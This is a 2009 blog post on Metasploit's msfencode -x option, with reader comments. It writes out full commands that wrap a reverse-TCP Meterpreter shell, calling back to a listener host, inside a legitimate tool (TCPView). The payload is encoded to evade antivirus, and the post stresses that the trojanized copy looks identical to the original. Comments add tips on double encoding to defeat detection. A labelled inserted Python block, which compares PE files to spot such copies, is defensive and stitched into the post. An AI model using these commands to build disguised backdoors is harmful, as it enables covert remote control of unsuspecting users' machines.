Metasploit Blends in: New MSFPayload/ENcode
Monday, November 2, 2009 at 10:47PM
In Revision 7315 of the Metasploit Framework (SVN) a new option was added to MSFENCODE. Technically you always had the ability to do the following, but it required a bit of knowledge of the inner workings of the framework.
But before I get into the new feature, let's quickly go over the standard way you use msfencode:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -o /tmp/bob.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
root@bt4:/pentest/exploits/framework3#
We just used MSFPAYLOAD to output a reverse TCP connect Meterpreter payload in [R]AW format. We then piped it into MSFENCODE so that we could output it as a proper Windows executable (/tmp/bob.exe), encoded to avoid AV detection.
Now, if you knew where the template was (data/templates/template.exe), you could probably just replace template.exe with the executable you want loaded with the payload and call it a day. But then you wouldn't get some of the tweaks that make this update awesome.
The update added the (-x) option to msfencode. This allows you to specify an executable of your choosing to sacrifice to the gods. For example, with TCPView:
root@bt4:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 LPORT=443 R | ./msfencode -t exe -x /tmp/Tcpview.exe -o /tmp/Tcpview2.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
root@bt4:/pentest/exploits/framework3#
And if everything went well, we have a nice new executable in /tmp/ called Tcpview2.exe. Want to know the magic part? Try to tell them apart:
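Added example, not part of the original post or of Metasploit: two executables that look alike in a file browser can still be told apart by comparing the suspect copy against a known-good reference, here by whole-file hash, entry point and per-section hashes. The function names (pe_fingerprint, compare, sample_pe) are hypothetical and the sample buffers are constructed; the page does not state which of these fields a -x output changes.

```python
import hashlib
import struct

def pe_fingerprint(data: bytes) -> dict:
    """Whole-file SHA-256, entry point RVA and a SHA-256 per section."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off, = struct.unpack_from("<I", data, 0x3C)        # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    n_sections, = struct.unpack_from("<H", data, pe_off + 6)
    opt_size, = struct.unpack_from("<H", data, pe_off + 20)
    entry_rva, = struct.unpack_from("<I", data, pe_off + 24 + 16)
    table = pe_off + 24 + opt_size                         # first section header
    sections = {}
    for i in range(n_sections):
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from(
            "<8sIIII", data, table + 40 * i)
        body = data[raw_ptr:raw_ptr + raw_size]
        sections[name.rstrip(b"\0").decode("latin-1")] = hashlib.sha256(body).hexdigest()
    return {"sha256": hashlib.sha256(data).hexdigest(),
            "entry_rva": entry_rva, "sections": sections}

def compare(reference: bytes, suspect: bytes) -> list:
    """List what differs between a known-good PE and a look-alike copy."""
    ref, sus = pe_fingerprint(reference), pe_fingerprint(suspect)
    if ref["sha256"] == sus["sha256"]:
        return []
    findings = ["file hash differs"]
    if ref["entry_rva"] != sus["entry_rva"]:
        findings.append("entry point moved")
    for name in sorted(set(ref["sections"]) | set(sus["sections"])):
        if ref["sections"].get(name) != sus["sections"].get(name):
            findings.append(f"section {name} changed")
    return findings

def sample_pe(text: bytes, entry_rva: int = 0x1000) -> bytes:
    """Constructed PE-shaped buffer with one .text section (test input only)."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)             # AddressOfEntryPoint
    sect = struct.pack("<8sIIII16x", b".text", len(text), 0x1000, len(text), 0x200)
    return (dos + coff + bytes(opt) + sect).ljust(0x200, b"\0") + text

if __name__ == "__main__":
    good, odd = sample_pe(b"vendor code bytes"), sample_pe(b"other code bytes", 0x1010)
    print(compare(good, good), compare(good, odd))
```

On real files, pass the bytes of the vendor's original download as the reference and the bytes of the copy under examination as the suspect.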
Reader Comments (13)
This is epic, I will have to play with this soon! Thanks man.
Thanks, something extra to play with soon.
this is THE most essential update to the metasploit arsenal, great timing!
Looks sick - quick one tho -
when you use the -x switch, does it keep the original executable intact
(i.e. does the TCPview2 run like the original while adding the rev meterpreter)?
Cheers Rob. Very nice, can't wait to have a play.
Very very cool feature. I wonder when we'll start seeing Malware using it in-the-wild.
good explanation. similar to the iexpress packaging stuff you showed off. dig it.
RE: Dumbars3 -
Nope, it pretty much takes over the process flow of the binary. But this is a good thing in a lot of ways.
Nice post, thanks!
just to mention that the -e x86/shikata_ga_nai parameter call was missed out (based on the command output).
RE: Anastasios Monachos
Setting the encoder type using -e is a good habit to get into but shikata_ga_nai is actually the default encoder, so you don't have to specify the encoder type.
--
Rob
This technique seems deprecated already.
AVG and many AV report win32/heur when scanning payloads encoded with -x
It's always a cat and mouse game.
double encode with the right encoders and AV detection dwindles